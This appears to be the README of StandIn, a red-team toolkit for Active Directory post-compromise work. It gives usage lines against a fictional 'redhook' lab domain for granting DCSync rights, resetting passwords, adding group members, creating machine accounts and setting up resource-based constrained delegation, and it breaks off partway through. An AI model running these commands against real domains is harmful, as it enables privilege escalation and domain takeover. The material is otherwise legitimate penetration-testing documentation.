StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.

I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.

Roadmap

Contributing

Contributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.

ToDo’s

The following items are currently on the radar for implementation in subsequent versions of StandIn.

• Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
• Finding and parsing GPO’s to map users to host local groups.

Subject References

• An ACE up the sleeve (by @_wald0 & @harmj0y) – here
• Kerberoasting (by @xpn) – here
• Roasting AS-REPs (by @harmj0y) – here
• Kerberos Unconstrained Delegation (by @spotheplanet) – here
• S4U2Pwnage (by @harmj0y) – here
• Resource-based Constrained Delegation (by @spotheplanet) – here
• Rubeus – here
• Powerview – here
• Powermad (by @kevin_robertson) – here

Index

• Help
• LDAP Object Operations
  • Get object
  • Get object access permissions
  • Grant object access permission
  • Set object password
  • Add ASREP to object flags
  • Remove ASREP from object flags
• ASREP
• SPN
• Unconstrained / constrained / resource-based constrained delegation
• DC’s
• Groups Operations
  • List group membership
  • Add user to group
• Machine Object Operations
  • Create machine object
  • Disable machine object
  • Delete machine object
  • Add msDS-AllowedToActOnBehalfOfOtherIdentity
  • Remove msDS-AllowedToActOnBehalfOfOtherIdentity
• Detection

Help

  __ ( _/_   _//   ~b33f__)/(//)(/(/)  v0.8 >--~~--> Args? <--~~--<--help        This help menu--object      LDAP filter, e.g. samaccountname=HWest--computer    Machine name, e.g. Celephais-01--group       Group name, e.g. "Necronomicon Admins"--ntaccount   User name, e.g. "REDHOOKUPickman"--sid         String SID representing a target machine--grant       User name, e.g. "REDHOOKKMason"--guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2--domain      Domain name, e.g. REDHOOK--user        User name--pass        Password--newpass     New password to set for object--type        Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync--spn         Boolean, list kerberoastable accounts--delegation  Boolean, list accounts with unconstrained / constrained delegation--asrep       Boolean, list ASREP roastab   le accounts--dc          Boolean, list all domain controllers--remove      Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object--make        Boolean, make machine; ms-DS-MachineAccountQuota applies--disable     Boolean, disable machine; should be the same user that created the machine--access      Boolean, list access permissions for object--delete      Boolean, delete machine from AD; requires elevated AD access >--~~--> Usage? <--~~--<# Query object properties by LDAP filterStandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Query object access permissions, optionally filter by NTAccountStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --accessStandIn.exe --object samaccountname=Rllyeh$    --access --ntaccount "REDHOOKEDerby"StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Grant object access permissionsStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOKMBWillett" --type DCSyncStandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOKMBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOKMBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Set object passwordStandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Add ASREP to userAccountControl flagsStandIn.exe --object samaccountname=HArmitage --asrepStandIn.exe --object samaccountname=FMorgan --asrep    --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Remove ASREP from userAccountControl flagsStandIn.exe --object samaccountname=TMalone --asrep --removeStandIn.exe --object samaccountname=RSuydam --asrep  --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all ASREP roastable accountsStandIn.exe --asrepStandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all kerberoastable accountsStandIn.exe --spnStandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# List all accounts with unconstrained & constrained delegation privilegesStandIn.exe --delegationStandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Get a list of all domain controllersStandIn.exe --dc# List group membersStandIn.exe --group LiterarumStandIn.exe --group "Magna Ultima" --domain redhook --user R   Fludd --pass Cl4vi$Alchemi4e# Add user to groupStandIn.exe --group "Dunwich Council" --ntaccount "REDHOOKWWhateley"StandIn.exe --group DAgon --ntaccount "REDHOOKRCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Create machine objectStandIn.exe --computer Innsmouth --makeStandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Disable machine objectStandIn.exe --computer Arkham --disableStandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Delete machine objectStandIn.exe --computer Danvers --deleteStandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object propertiesStandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543StandIn.exe --computer Providence --sid S-1-5-21-10   85031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object propertiesStandIn.exe --computer Miskatonic --removeStandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

LDAP Object Operations

All object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design.

Get object

Use Case

Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is member of or when a user account last authenticated to the domain.

Continue following on GitHub

GitHub: